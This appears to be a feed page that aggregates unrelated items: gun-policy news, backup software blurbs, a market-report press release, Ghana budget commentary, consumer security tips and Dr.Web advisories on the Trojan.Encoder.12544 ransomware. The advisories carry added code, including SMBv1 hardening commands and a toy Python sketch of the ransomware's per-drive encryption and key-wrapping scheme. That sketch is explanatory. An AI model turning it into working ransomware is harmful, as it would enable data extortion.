    State-based regulation—the status quo—may have worked once upon a time, but the malt shop closed a long time ago. This sport, long since national, has gone global. The time has come for national cohesiveness in the rules, regulations, and penalties in Thoroughbred racing.

              US Supreme Court Rejects Gun Rights Appeal   


    The United States Supreme Court has rejected another call to decide whether Americans have a legal right to carry guns outside their homes.

    The high court released rulings on a number of cases Monday. But it refused to hear a case against a California law that sets limits on carrying guns in public.

    The high court left in place an appeals court ruling in the case.

    The appeals court confirmed the legality of a measure to limit permits for concealed weapons -- those placed out of sight.

    The Supreme Court ruled in 2008 that the United States Constitution guarantees the right to carry a gun, at least for self-defense at home. But the court has refused repeated requests to expand on its understanding of gun rights.

    More than 40 states already have rules giving gun owners a right to be armed in public.

    A new study shows that Americans are as deeply divided about gun policy as they are about immigration, health care and other issues.

    The Pew Research Center questioned 3,900 people nationwide. The resulting study found sharp differences of opinion between gun owners and those who do not own guns.

    The study found that more than half of owners support creation of a federal database for recording gun sales. Eighty percent of those who do not own guns also support such an effort.

    About half of gun owners support a ban on assault weapons, compared to almost 80 percent of non-gun owners.

    Assault weapons have been compared to guns used in armed conflicts. Gun control activists say such weapons are meant to kill multiple people quickly, and not for civilian use.

    Yet there was common ground among gun owners and non-gun owners on other issues.

    Nearly 90 percent of all those questioned believe the government should bar the mentally sick from purchasing guns.

    Also, about 80 percent of those who own guns believe people named on federal no-fly or watch lists should be prevented from buying guns.

    Strong majorities of both groups support background investigations of those who buy guns from an individual or at gun shows.

    The study also found that at least two-thirds of Americans have lived in a home with a gun. About half of those questioned who have never owned a gun said they had fired one.

    About 1,300 of the 3,900 people questioned said they own guns. The rest said they did not.

    Most of the gun owners described themselves as white males who are members of the Republican Party.

    The study found that people who live in the Northeastern United States are less likely to own a gun than are people in other parts of the country.

    I’m Caty Weaver.

    Wayne Lee wrote this story for VOANews.com. Christopher Jones-Cruise adapted it for Learning English. George Grow was the editor.

    We want to hear from you. Write to us in the Comments Section, or visit our Facebook page.

    Words in This Story

    concealed – adj. hidden from sight

    database – n. a collection of pieces of information that is organized and used on a computer

    assault weapon – n. a gun that can shoot many bullets quickly and that is designed for use by the military

    multiple – adj. more than one; many

    background – n. the experiences, knowledge, education, etc., in a person’s past

              IObit Uninstaller   

    IObit Uninstaller offers the easiest and fastest way to uninstall programs and browser plug-ins. With its Powerful Scan and Enhanced Uninstall, all leftovers can be removed from your computer completely, as if they had never been installed on your PC. In addition, IObit Uninstaller pays special attention to malicious browser plug-ins, toolbars and injected programs, to protect your PC's online security. Using IObit Uninstaller, you can remove malicious and unwanted plug-ins or toolbars that cannot be detected by anti-spyware programs. The main new features in the latest version: added removal of Microsoft Edge plug-ins and extensions; a larger database to remove more malicious and advertising browser plug-ins for a safer and faster browser; supported uninstallation of more than 4,000 stubborn programs and browser plug-ins; deeper and faster Deep Scan; better support for uninstalling Windows apps; optimized real-time monitoring of leftovers from other third-party uninstallers; two themes supported and a new, larger font for a better user experience; 38 languages supported. More new features are yours to discover.

              Uranium Backup   

    Uranium Backup is a complete software solution for managing automated backups of your system's data. It is compatible with Windows operating systems, including Windows 7, and is available in 9 languages: Italian, English, Spanish, Polish, French, Dutch, German, Russian and Brazilian Portuguese.

    What Uranium Backup does:
    Disaster Recovery (Drive Image backup and Bare Metal restore)
    Uranium can create complete images of the system disk, allowing the operating system and all its settings to be restored in one go (bare metal restore). Available on Vista, Server 2008 and Windows 7 operating systems.
    Tape backup
    One of the simplest and most versatile tape backup programs in the world. Compatible with DAT, DDS, DLT, SDLT, AIT, VXA, LTO, etc. Works with any tape drive (SCSI, IDE, USB, SAS, etc.). The simplest and most affordable solution for tape backup on Windows Vista and Server 2008. (read the tutorial ->)
    CD and DVD burning
    Backup by burning to CD and DVD. Also writes to DVD-RW, DVD-RAM and DVD+R DL (dual layer); can create multisession discs and ISO files.
    SQL Server database backup
    Backup of Microsoft SQL Server databases (including Express Edition and MSDE) with built-in zip compression. Lets you schedule backups of an unlimited number of databases and copy the backup files to tape, DVD, FTP, LAN, etc. (read the tutorial ->)
    FTP and SFTP - upload and download
    Sends backups to remote servers with zip compression and encryption, performs scheduled and automated uploads of websites, downloads websites, and acts as an FTP and SFTP client. (read the website download tutorial ->)
    Backup to disk, zip compression, synchronization
    Copies files and folders to local disks, external USB or FireWire hard drives, NAS servers, iOmega REV drives, RDX drives, or other PCs on the network, with options for zip compression, encryption, deletion of old files and much more.
    Scheduled automatic backups
    Backups can be scheduled by day, hour and minute, with built-in scheduling and background execution as a service.
    E-mail notifications
    Automatically sends reports by e-mail to one or more addresses, so you are always informed whether backup procedures succeeded or failed.
    Virtual server backup
    Can back up Hyper-V and VMware ESX/ESXi/vSphere virtual machines, back up to tape, and back up MySQL and MariaDB databases.

    And also: runs as a service; Volume Shadow Copy - copies locked files (XP, 2003, Vista, 2008, 7); AES 256-bit encryption; backup via e-mail - sends backups as zipped e-mail attachments; copies files and folders from unlimited sources to unlimited destinations; synchronization with optional deletion of old files (mirroring); incremental Zip64 compression - creates large zip archives; portable and lightweight - runs even without installation and has no special requirements; security, reliability and performance with very low use of system resources; compatible with Windows: XP / 2000 / 2003 / 2008 / Vista / 7 - 32 and 64 bit
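    The "zip compression plus FTP upload" backup flow that Uranium Backup describes can be sketched with Python's standard library alone. This is an illustrative sketch, not Uranium's implementation: the host name and credentials are placeholders, and the upload call is left commented out because it needs a reachable server.

```python
import zipfile
from ftplib import FTP
from pathlib import Path

def zip_folder(src: Path, dest_zip: Path) -> Path:
    """Compress every file under src into a single zip archive."""
    with zipfile.ZipFile(dest_zip, "w", zipfile.ZIP_DEFLATED) as zf:
        for f in src.rglob("*"):
            if f.is_file():
                zf.write(f, f.relative_to(src).as_posix())
    return dest_zip

def upload_ftp(zip_path: Path, host: str, user: str, password: str) -> None:
    """Send the archive to a remote FTP server in binary mode."""
    with FTP(host) as ftp:
        ftp.login(user, password)
        with open(zip_path, "rb") as fh:
            ftp.storbinary(f"STOR {zip_path.name}", fh)

# Demo: archive a scratch folder; the upload itself needs a real FTP server.
src = Path("scratch")
src.mkdir(exist_ok=True)
(src / "report.txt").write_text("nightly data")
archive = zip_folder(src, Path("backup.zip"))
# upload_ftp(archive, "ftp.example.com", "backup_user", "secret")  # placeholders
```

    A real backup tool would add retention, encryption and retry logic on top of this skeleton; the point here is only how compression and transfer chain together.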

    New features: new incremental/differential backup of files and folders; better performance (of both the interface and backup operations); far more reliable backup of both ESX(i) and Hyper-V virtual machines; full backups of Exchange mailboxes are now possible (significantly improving performance on SBS 2011); files and folders encrypted with BitLocker can now be backed up; files and folders with paths longer than 256 characters can now be zip-compressed; the service installation can now be tested during the free trial period

    Fixed bugs: minor improvements and bug fixes (no more FTP loops, no more folder-authentication problems, and much more)

              Iperius Backup   

    Iperius Backup is a complete solution for safeguarding company data and protecting confidential information. Its many functions, its flexibility and the many types of backup it supports make it an all-round utility for backing up and transferring data. It is compatible with Windows 8 and Server 2012, and offers installation as a service, e-mail notifications, copying of open files, synchronization and an incredible number of backup types.

    Iperius Backup can back up to a wide range of devices, and includes Drive Imaging (disaster recovery), backup to DAT and LTO tape, backup to NAS and RDX, backup to external USB disks, backup of SQL Server, MySQL, MariaDB, PostgreSQL and Oracle databases, FTP backup (upload and download), zip compression, file synchronization and online backup to the Google Drive, OneDrive, Dropbox, Amazon S3 and Microsoft Azure cloud services. It can also back up VMware ESXi or Hyper-V virtual machines.

    What's new in this version: compatible with Windows Server 2016 and SQL Server 2016; considerably faster and improved FTP upload backup, especially with multiple connections and when backing up over FTP to a NAS on the local network; improved automatic reconnection during FTP backups; updated SSL libraries; FTP and Cloud destinations now also show the sub-path (in the destination list); updated MySQL and PostgreSQL backup procedures; added a button to test the connection to the Web Console; the last schedule is now remembered even when disabled; backups can now be started manually but run through the service. Exchange backup: Iperius can perform hot backups of Exchange mail servers, in image mode with log truncation and/or by exporting individual mailboxes to PST files. It also allows granular restores of single mailboxes from PST files.

              Comment on Ubuntu One by Top cpanel reseller web hosting in Mayang Imphal   
    It is essential to supply customers having a summary page of these orders to allow them to review all of the details before making the purchase. Internet not merely adds towards the luxury and comforts in your lifetime but also provides an ample space for earning your livelihood too. In addition, their reseller plans have site builder software, 32 self installing PHP scripts, FTP accounts, and My - SQL databases. This is done through the use of reseller website hosting. There are a level of very good factors why individuals are getting associated with running their own companies online. If you are seeking cheap and reliable internet hosting, VPS is for you. The Web hosting India service commences with buying your own personal Uniform Resource Locator (URL). You don't really must do a much more work to earn that additional income. A site is an individual with the most widespread advertising and marketing instruments utilised by around date entrepreneurs in buy to succeed in and seize a wider purchaser base for solutions and services. But in case you have signed up totally free service these ads could be annoying sometimes.
              Big Data Market: Embracing Data to Transform Healthcare and Pharma Commercial Strategy - Featuring Expert Panel Views from Industry Survey 2016   

    "Big Data: Embracing Data to Transform Healthcare and Pharma Commercial Strategy - Featuring Expert Panel Views from Industry Survey 2016" provides a comprehensive analysis of the Big Data landscape. GBI Research conducted an extensive industry survey of 73 experts from the pharmaceutical and healthcare industries.

    Pune, Maharashtra -- (SBWIRE) -- 02/09/2017 -- "Big Data: Embracing Data to Transform Healthcare and Pharma Commercial Strategy - Featuring Expert Panel Views from Industry Survey 2016" provides a comprehensive analysis of the Big Data Market landscape. GBI Research conducted an extensive industry survey of 73 experts from the pharmaceutical and healthcare industries - including both organizations that already utilize Big Data and those that do not. The survey gathered experience and opinion on the use of Big Data, and insights on key trends for the present and future use of the technology within healthcare.

    Big Data refers to any data set that is too large to store, process or analyze using traditional database software and hardware. It can have a significant impact on all aspects of the pharmaceutical and healthcare sector, and companies are making large investments to leverage the technology more effectively.

    Browse more detailed information about Big Data Market


    The report features an overview of Big Data and its place within healthcare. It examines the factors driving and necessitating the use of the technology within this industry, and provides detailed examples of how different Big Data sources and analytics techniques could be used to provide direct benefits to pharmaceutical companies, healthcare institutions and patients.

    Big Data Market Scope:

    - What is Big Data? What is its place within healthcare, and what are the main data sources?

    - How prevalent is the use of Big Data in healthcare?

    - What are the main driving factors necessitating the use of Big Data in healthcare? What is the relative importance of these factors according to industry?

    - What are examples of the commercial benefits that the use of Big Data and analytics can provide, in different aspects of the industry?

    - What are the main challenges associated with Big Data in healthcare? What is the relative importance of these factors according to industry? For the organizations that do not yet utilize Big Data, what specific reasons have led to their decision not to do so?

    - How do major pharmaceutical and healthcare companies use Big Data in the real world? What are some of the main partnerships between Big Pharma and technology companies? What is the underlying technical architecture of Big Data in healthcare?

    - What is the likelihood that organizations that already use Big Data will increase their investment within the next five years? Will those that do not currently invest in the technology begin doing so in the next five years?

    - How can Big Data be effectively implemented within an organization?

    Get a PDF Sample of Women health:


    Reasons to Purchase:

    Healthcare report will allow clients to have an understanding about market opportunities and competitive analysis and forecast on the women's healthcare industry. Interested clients will get a view on how therapies are developing for changing conditions and all the key factors that play together to affect or improve women's health.

    Have any query? Ask our expert @ http://www.absolutereports.com/enquiry/pre-order-enquiry/10529057

    Detailed TOC of Big Data Market - Assessing the Need for a Targeted and Specialized Approach

    1 Big Data Overview 9
    - What is Big Data? 9
    - The 'Three Vs' of Big Data: Volume, Velocity and Variety 9
    - The Sources of Big Data in Healthcare 10
    - Big Data Lifecycle 12
    - How Prevalent is the Use of Big Data in Healthcare? Results from our Industry-Wide Survey 13

    2 Drivers of Big Data in Healthcare 17
    - Advances in Technology: Explosion in Data Generation 17
    - Next-Generation Sequencing Technologies: Outpacing Moore's Law 17
    - Proteomic Databases: ProteomicsDB Designed with Big Data Analytics in Mind 18
    - Electronic Health Records: A Form of Big Data 19
    - Social Media: Information That Cannot Be Found Anywhere Else 19
    - Devices: Smartphones, Wearables and Telemedicine Devices Represent a Continuous Source of Big Data 20
    - Cloud Technologies: Often Integral to Big Data 20
    - Needs and Trends Driving the Use of Big Data in Healthcare 21

    3 Commercial Implications of Big Data in Healthcare 27
    - Predictive Modeling: Fundamental Source of Big Data's Power 27
    - Using Big Data for Patient-Specific Modeling: Potential for Huge Healthcare Savings 28
    - Big Data Unlocks the Potential of Personalized Medicine and Targeted Therapies 28
    - Utilizing the Unique Big Data Provided by Wearables and Fitness Trackers 29
    - Big Data for a More Systemic Approach to Drug Repositioning 29
    - Drug Discovery and Pre-Clinical Trials: Big-Data-Guided Drug Development 29

    4 Appendix 63
    - GBI Industry Survey: Breakdown of Respondents by General Industry 63
    - GBI Industry Survey: Breakdown of Respondents by Specific Sector 63
    - GBI Industry Survey: Breakdown of Respondents by Region 63
    - GBI Industry Survey: Proportion of Healthcare Organizations that Currently Utilize Big Data 64
    - GBI Industry Survey: Big Data Utilization in Healthcare, Comparison of Expert Panels from Europe, North America and Asia 64
    - GBI Industry Survey: Most Important Factors Promoting the Use of Big Data in Healthcare 65
    - GBI Industry Survey: Most Important Factors Promoting Big Data, Pharmaceutical Expert Panel vs Overall Healthcare Expert Panel 65
    - GBI Industry Survey: Most Important Factors Promoting Big Data, Regional Breakdown 66
    And continued...

    Get Discount on Big Data Market:

    About Absolute Report
    Absolute Reports is an upscale platform to help key personnel in the business world in strategizing and taking visionary decisions based on facts and figures derived from in-depth market research. We are one of the top report resellers in the market dedicated towards bringing you an ingenious concoction of data parameters.

    For more information on this press release visit: http://www.sbwire.com/press-releases/big-data-market-embracing-data-to-transform-healthcare-and-pharma-commercial-strategy-featuring-expert-panel-views-from-industry-survey-2016-769494.htm

    Media Relations Contact

    Ameya Pingaley
    Absolute Reports
    Telephone: 408-520-9750
    Email: Click to Email Ameya Pingaley
    Web: https://www.absolutereports.com/big-data-embracing-data-to-transform-healthcare-and-pharma-commercial-strategy-featuring-expert-panel-views-from-industry-survey-2016-10529057

              Instructions for users affected by Trojan.Encoder.12544   

    June 28, 2017

    Trojan.Encoder.12544 spreads by exploiting the SMB v1 vulnerability - MS17-010 (CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148), which can be leveraged using the NSA "ETERNAL_BLUE" exploit. TCP ports 139 and 445 are used to propagate the Trojan. This “remote code execution” vulnerability enables attackers to remotely infect targeted computers.

    1. To regain access to Windows, you need to recover the MBR (you can use the standard procedure in the Recovery Console and launch bootrec.exe /FixMbr).

      You can also restore the boot record using Dr.Web LiveDisk — create a bootable CD or USB drive, boot up from that media, launch the Dr.Web scanner, check the compromised hard drive for viruses, and choose Cure for all the infected files.

    2. After that disconnect your PC from the network, boot up, and apply the patch MS17-010 https://technet.microsoft.com/en-us/library/security/ms17-010.aspx.
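    In addition to installing the patch, the SMBv1 attack surface itself can be reduced. A sketch using standard Windows PowerShell cmdlets (run from an elevated prompt; cmdlet availability depends on the Windows version, so treat this as an illustrative fragment rather than a verified hardening procedure):

```shell
# Check whether the SMBv1 server protocol is currently enabled
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol

# Disable SMBv1 -- the protocol the ETERNAL_BLUE exploit targets
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

# Block inbound TCP 139 and 445, the ports the Trojan uses to spread
# (note: this also blocks legitimate file and printer sharing)
New-NetFirewallRule -DisplayName "Block inbound SMB" -Direction Inbound `
    -Protocol TCP -LocalPort 139,445 -Action Block
```

    Disabling SMBv1 does not replace the MS17-010 patch; the two measures are complementary.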

    3. Then install Dr.Web, establish a connection to the Internet, update the virus databases, and run a full system scan.


    The Trojan replaces the MBR (Master Boot Record), then schedules and executes a system restart task. After that the OS won't boot up, because the Master Boot Record has been compromised. Data starts being encrypted as soon as the system restart is scheduled. A separate AES key is generated for each drive. The key persists in memory until the disk is completely encrypted; it is then encrypted using a public RSA key and deleted. If the MBR is replaced successfully, the MFT file is also encrypted once the system restarts. This file contains information about all the files on an NTFS drive. Once all these procedures are complete, the data can only be recovered using a private key; without that key, no files can be recovered.
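    The key handling described above is a classic hybrid-encryption pattern: a fresh symmetric key encrypts each drive, and only an asymmetrically "wrapped" copy of that key survives. A minimal conceptual sketch in Python - a toy XOR keystream and a toy reversible wrap stand in for the real AES and RSA, so this illustrates only the structure of the scheme, not the malware itself:

```python
import hashlib
import os

def keystream_xor(data: bytes, key: bytes) -> bytes:
    """Toy XOR stream cipher -- a stand-in for the Trojan's AES layer."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(d ^ s for d, s in zip(data, stream))

def wrap_key(session_key: bytes) -> bytes:
    """Toy reversible wrap -- a stand-in for encrypting the key with an RSA public key."""
    return session_key[::-1]

# One fresh key per drive; the plaintext key is discarded after wrapping,
# so only the holder of the unwrapping secret can ever recover the data.
drives = {"C": b"files on C", "D": b"files on D"}
encrypted, wrapped = {}, {}
for name, data in drives.items():
    session_key = os.urandom(32)        # per-drive symmetric key
    encrypted[name] = keystream_xor(data, session_key)
    wrapped[name] = wrap_key(session_key)
    del session_key                     # key no longer held in plaintext
```

    Applying `keystream_xor` again with the unwrapped key restores the plaintext, which is exactly why recovery is impossible without the attacker's private key in the real scheme.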

    As of now, decryption is not available. Our analysts are researching the problem and looking for a solution. We will notify you once a final determination has been made.

              A new encryption ransomware attacking Russian and Ukrainian companies   

    June 27, 2017

    Information has appeared about a new outbreak of encryption ransomware. The Trojan has affected oil, telecommunications and financial companies in Russia and Ukraine. Doctor Web informs users that the new encoder is detected by Dr.Web products.

    According to our information security specialists, the Trojan spreads on its own, just like the infamous WannaCry, but there is as yet no precise data on whether it uses the same distribution mechanism. Our security researchers are currently examining the new Trojan; we will publish details later. Some media outlets draw parallels with the Petya ransomware (which Dr.Web detects as Trojan.Ransom.369) because of the outward similarity in how the ransomware operates; however, the new threat's distribution method differs from Petya's standard pattern.

    Today, June 27, at 4:30 p.m., this encryption ransomware was added to the Dr.Web virus databases as Trojan.Encoder.12544.

    Doctor Web advises all users to be vigilant and to refrain from opening suspicious emails (this measure is necessary but not sufficient on its own). It is essential to back up critically important data and to install all software security updates. Having an anti-virus installed is also crucial.

              Global Database Encryption Market Report 2017-2022: Analysis By Database Operational Model, Deployment Type & Database Encryption Type   
    ...DUBLIN , June 28, 2017 /PRNewswire/ -- Research and Markets has announced the addition of the "Global Database Encryption Market Analysis 2017 - Forecast to 2022" report to their offering. Logo The report contains up to date financial data derived from varied research sources ...

          Internship: Digital Marketing Intern in Ypenburg   
    <p>For the head office we are looking, <strong>starting September 2017</strong> and for at least 5 months, for a:</p> Digital Marketing Intern <p>We are responsible for the branding and marketing of the Netherlands at home and abroad. Through the 'Holland' brand we put the Netherlands on the map as an attractive destination for holidays, business meetings and conferences.</p> <p>For the worldwide promotion of the Netherlands we are active in Europe, (South) America and Asia. At the head office in The Hague (40 employees) the marketing strategy for Holland is set and campaigns are developed. The NBTC offices in the various countries are responsible for local market development and the execution of the marketing campaigns. </p>   <p>The Digital Marketing department is an independent-minded department that spends all day thinking from the perspective of the foreign visitors on the Holland channels. We try to identify their needs and entice them to book their holiday to the Netherlands. We already know a lot about our foreign visitors, such as the search terms they use. We have also mapped their buying styles and segment them in real time. This allows us to provide more than eight million foreign visitors a year with very specific information, and so stimulate their visits to the Netherlands.</p> <p>For our fifteen multilingual websites we work with a content database of about 1,250 source articles that are shown dynamically in context with one another. We do this by tagging the articles with terms from the taxonomy. The taxonomy was last thoroughly reviewed in 2011, and in 2017 we want to take a close look at it again.
Also because we want to change our navigation structure and make well-considered decisions about it.</p> Internship content <p>During the internship you will help improve the website in the areas of:</p> <ul> <li><strong>SEO</strong></li> <li>How do we get found well in Google?</li> <ul> <li>Which topics can we write more, and better, about?</li> </ul> <li><strong>Bookings</strong></li> <ul> <li>How do we make sure our bookable offering is highlighted even better?</li> <li>How do we raise its conversion rate?</li> </ul> <li><strong>Insights</strong></li> <ul> <li>What do we see happening in Google Analytics, and what action can we take on it?</li> <li>How do we set up our reports?</li> </ul> <li><strong>Content</strong></li> <ul> <li>Which pages should we improve?</li> <li>How do we get our visitors to view more pages and come back more often?</li> </ul> <li><strong>Campaigns</strong></li> <li>Where do you see opportunities to optimise how campaigns are set up on holland.com?</li> <li>What insights do we draw from previous campaigns, and how do we translate them into new campaigns?</li> <li>Which onsite segmentation and targeting do we set up?</li> <li>How can we design the campaign reporting even better, and which insights do we want it to contain?</li> </ul> We offer you: <ul> <li>A challenging and educational internship</li> <li>Plenty of opportunity to shape it yourself</li> <li>The chance to market the Netherlands' most enjoyable product</li> <li>Becoming part of a great team whose members lead the way in their specialisms</li> </ul> ...
              Database Analyst with SQL   
    Miamisburg, OH — contract good through 12/31/17. My client, a leading provider of science and health information technology, publications and journals, is seeking a Database Analyst for an 8-month+ contract opportunity. Knowledge and Experience: Bachelor's degree in Information Technology or Computer Science; 4 years of database management experience. Skills and Competencies: ECL
              Stage: Stagiair Database Marketing in Amersfoort   
              Chilling Taxes For The Property Market   
    Last night, I took my eyes off my Study Bible to read Ghana’s 2011 Budget. It was revealing. Some sections were interesting, others were like political grammar. But in this article, I would like to share with you how the 2011 Budget may affect the land and property market. It’s about the government’s proposed property taxes.

    Property Rates
    Just today, I have been hearing media speculation about possible hikes in rent as a result of the government’s intention to strengthen the administration of property rates. I have a different opinion. Strengthening property rate administration does not necessarily mean increasing the property rates to be paid by property owners. It may as well mean that property rates that are not being collected will be collected as a result of effective administration. Actually, this is what the budget says.
    “…in many economies, property taxes contribute substantially to revenue mobilization. In Ghana, property taxes make up only 0.03 percent of Ghana’s GDP.” “…there is huge potential for the MMDAs to improve their revenue mobilization through property taxes and be less dependent on the Common Fund in providing local services and amenities.” “…payment of property tax is a civic duty. We need those taxes to improve basic local amenities such as sanitation, water, and street lights. Moreover, the government provides services like police protection and judicial services in order for all of us to enjoy our property peacefully. It is our intent to work with the Ministry of Local Government and Rural Development to strengthen capacity in the administration of property taxes in this country. An improved scheme will be put in place by the end of the first quarter of 2011 to take effect in the second quarter.” “…I wish to propose to this House that in the near future, government releases to the Assemblies may place more weight on their revenue mobilization efforts as reflected in the DACF formula.”
    Does this sound like increasing taxes? It only refers to strengthening property rate administration. I think that if the revenue mobilized from property rates would be used to improve the standard of living of every living Ghanaian, then it must be paid.

    No Tax Holidays for Real Estate Developers
    Another hullabaloo that I expected, but which has not come yet, is from real estate developers like GREADA. Why are they not talking about the government’s intention to take away the five-year tax exemption, like they did with the STX deal? Or is it that they fear being charged with “causing fear and panic”?
    What I am talking about is what the 2011 Budget provides at item 143: “…the five years exemption period granted to companies engaged in the construction for letting or sale of residential premises under Section 11(6) of Act 592 was mainly to create affordable accommodation for the middle to low income earners. Unfortunately, the real estate developers focused on building for the high and upper class of the society while abandoning the original purpose. The government proposes to abolish the general five year tax exemption for real estate developers. However, given government’s heavy involvement with the provision of affordable housing, real estate developers who partner the Ministry of Works and Housing to provide affordable houses will continue to benefit from the five year exemption.”
    Why are real estate developers quiet? I should think that maybe they are preparing their petition to parliament.

    Taxing Land Professionals
    Another group of people to receive a chill from the Budget are individual land professionals such as real estate consultants, valuers, land surveyors and quantity surveyors. According to the Budget, “Ghana has many self-employed professionals who are contributing to economic development through the provision of professional services. Indeed it is very satisfying to note that on several government projects we have had opportunity to use our own competent professionals working in consultancy capacities. Knowing the level of fees paid for such services in the private sector, we think that it is the responsibility of these professionals to also contribute their quota as required by law and discharge their civic responsibility with regard to the payment of taxes. We are aware that a small but significant group of such professionals have conscientiously discharged their responsibility to the state. We want to acknowledge and recognize them, and at the same time create a conducive administrative framework for others to follow suit.”
    It continues that “…we want to encourage the voluntary compliance of professionals in their tax payments as a civic responsibility. Beginning 2011, Government will focus attention on the revenue contribution from the self-employed group with special emphasis on professionals. A special desk will be established in the Domestic Tax Division of the Ghana Revenue Authority to monitor compliance of professionals in their tax payments. The GRA will coordinate monitoring from the district level, reconcile data with the Registrar General’s Department to develop the necessary databases to facilitate monitoring, seek data from the recognized professional bodies, and assess current enforcement procedures.”
    The Ghana Institution of Surveyors, the Ghana Institute of Planners and the Ghana Institute of Architects must begin to assimilate the provisions of the budget and see how they may affect the consultancy services of individual members. This is an area worth discussing at the conferences of such professional bodies.

    Gift Tax Increased
    “…Gift Tax moves in tandem with general Income Tax including Capital Gains Tax. Since Capital Gains Tax has been increased from 5 percent to 15 percent [Internal Revenue (Amendment) Act, 2010 Act 797] it is only proper to do the same for Gift Tax. In this regard, an increase in gift tax to be in tandem with general income tax is being proposed. This will avoid shifting of Capital Gains to Gift Tax.”
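The proposed alignment is simple arithmetic: the gift tax rate would move from the old 5 percent to match the new 15 percent capital gains rate. A small illustration (the gift value below is a made-up example, not a figure from the Budget):

```python
# Illustrative only: gift tax moving in tandem with the capital gains rate,
# which Act 797 raised from 5% to 15%. The gift value is a made-up example.

OLD_RATE = 0.05  # pre-Act 797 rate
NEW_RATE = 0.15  # rate after alignment with Capital Gains Tax

def gift_tax(gift_value, rate):
    """Flat-rate tax on the value of a taxable gift."""
    return gift_value * rate

gift = 10_000  # hypothetical taxable gift, in cedis
print(gift_tax(gift, OLD_RATE))  # tax at the old 5% rate
print(gift_tax(gift, NEW_RATE))  # tax at the proposed 15% rate
```

The point of the alignment, as the Budget notes, is that with equal rates there is no longer any incentive to recharacterise a capital gain as a gift.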

    These are just policies. It is their implementation that would matter. It is their implementation that would determine how deeply these proposed property taxes may prick the land and property market.

              Info I wish I had before Today   

    Stop Unsolicited Mail, Phone Calls, & Email

    Tired of having your mailbox crammed with unsolicited mail, including preapproved credit card applications? Fed up with getting telemarketing calls just as you're sitting down to dinner? Fuming that your email inbox is chock-full of unsolicited advertising? The good news is that you can cut down on the number of unsolicited mailings, calls, and emails you receive by learning where to go to "just say no."

    Direct Marketers



    Mail & Email

     or mail your request with a $1 processing fee to:
    Direct Marketing Association
    P.O. Box 643
    Carmel, NY 10512

    Cell Phones and The Do Not Call Registry

    Despite what viral emails claim, there is no new cell phone database.
    Consumers may place their cell phone number on the National Do Not Call Registry to notify marketers that they don't want to get unsolicited telemarketing calls.
    The truth about cell phones and the Do Not Call Registry is:
    • The government is not releasing cell phone numbers to telemarketers.
    • There is no deadline for registering a cell phone number on the Do Not Call Registry.
    • Federal Communications Commission (FCC) regulations prohibit telemarketers from using automated dialers to call cell phone numbers without prior consent. Automated dialers are standard in the industry, so most telemarketers are barred from calling consumers' cell phones without their consent.
    • There is only one Do Not Call Registry, operated by the Federal Trade Commission (FTC), with information available at donotcall.gov. There is no separate registry for cell phones.
    • The Do Not Call Registry accepts registrations from both cell phones and land lines. To register by telephone, call 1-888-382-1222 (TTY: 1-866-290-4236). You must call from the phone number that you want to register. To register online (donotcall.gov), you will have to respond to a confirmation email.
    • If you have registered a mobile or other telephone number already, you don't need to re-register. Once registered, a telephone number stays on the Do Not Call Registry until the registration is canceled or service for the number is discontinued.

    Computer Security


    "Free" Security Scans

    Alarming messages on your computer warning that a "free" scan has found malware could be a rip-off.

    Computer Security

    Secure your computer and protect yourself from hackers, scammers, and identity thieves.

    Cookies: Leaving a Trail on the Web

    This Q&A can help answer questions you have about cookies and online tracking.

    Disposing of Old Computers

    Getting rid of a computer? Follow these instructions to protect your personal information.

    Hacked Email

    What to do if you think your email or social networking account has been hacked.

    Laptop Security

    Here’s how to prevent a thief from snatching your laptop — and all the valuable information it houses.


    Steps you can take to avoid, detect, and get rid of viruses and spyware

    P2P File-Sharing Risks

    Consider these computer security risks before you share files through a P2P network.


    What to do about messages that ask for your personal information

    Tech Support Scams

    Who is calling out of the blue, claiming to be able to "fix" your computer? A scammer, that’s who.


    Apps to Help You Shop in Stores

    What to know about apps that help you make purchases and find deals in brick-and-mortar stores

    Disposing of Your Mobile Device

    Dispose of your mobile phone safely.

    Understanding Mobile Apps

    Consider these questions before you download a mobile app.

    Using IP Cameras Safely

    When you shop for an internet camera, put security features at the top of your list. Here are tips to help.


    Securing Your Wireless Network

    Protect the wireless network in your home.

    Tips for Using Public Wi-Fi Networks

    Here’s how you can protect your personal information when you’re using public Wi-Fi hotspots.

    All information in this article has been provided by 


              How much for a good commercial website for a book publisher?   
    About how much should I budget to hire someone to redesign my website (I work for a small press, so it's like a book catalog) and provide me with a custom WordPress (or other blogging software) blog-type front page, as well as a database-driven book catalog (300-plus books, a page for each)? I'd need a fairly robust back end so I could manage the content myself, and I'd like to do direct sales as well, so a shopping cart and SSL setup and the like.

    Just ballpark is fine, two thousand bucks? Five thousand? Any suggestions for where I could find someone to do that?

    I currently have a website that does all this, but for various reasons want to switch up, I have a pretty good export of all the data from my current site.

              Good webhost?   
    What is a good price to pay for webhosting, database and a secure shopping cart? Hello Smarties,
    I'm looking into switching a web catalog and direct sales to a new host. I would need something fairly robust and reasonably slick in terms of a basic (no Flash or la-tee-dah) presentation of a book catalog, with direct secure sales. It would need a database backend (speaking of which, any recommendations, including among yourselves, for someone who could hook me up? email: divinewino@gmail.com). I would love a gateway interface with my cc processor as well. How much should I be looking to pay for reasonable bandwidth, email and the server(s)? Any recommendations for trustworthy people? I'd happily pay a little premium for a smaller shop that paid attention to me.

              Charity website sued over hate group labels on nonprofits   

    NEWPORT NEWS, Va. (AP) — A Florida-based legal advocacy organization is suing over a “hate group” label that it and other nonprofits received on a website that maintains a database of information about U.S. charities. Liberty Counsel Inc. filed a federal lawsuit Wednesday against GuideStar USA Inc. in Newport News, Virginia. GuideStar flagged 46 nonprofits, […]
              Low-Power IEEE 1801 / UPF Simulation Rapid Adoption Kit Now Available   

    There is no better way than a self-help training kit -- a rapid adoption kit, or RAK -- to demonstrate the Incisive Enterprise Simulator's IEEE 1801 / UPF low-power features and their usage. The features include:

    • Unique SimVision debugging 
    • Patent-pending power supply network visualization and debugging
    • Tcl extensions for LP debugging
    • Support for Liberty file power description
    • Standby mode support
    • Support for Verilog, VHDL, and mixed language
    • Automatic understanding of complex feedthroughs
    • Replay of initial blocks
    • 'x' corruption for integers and enumerated types
    • Automatic understanding of loop variables
    • Automatic support for analog interconnections


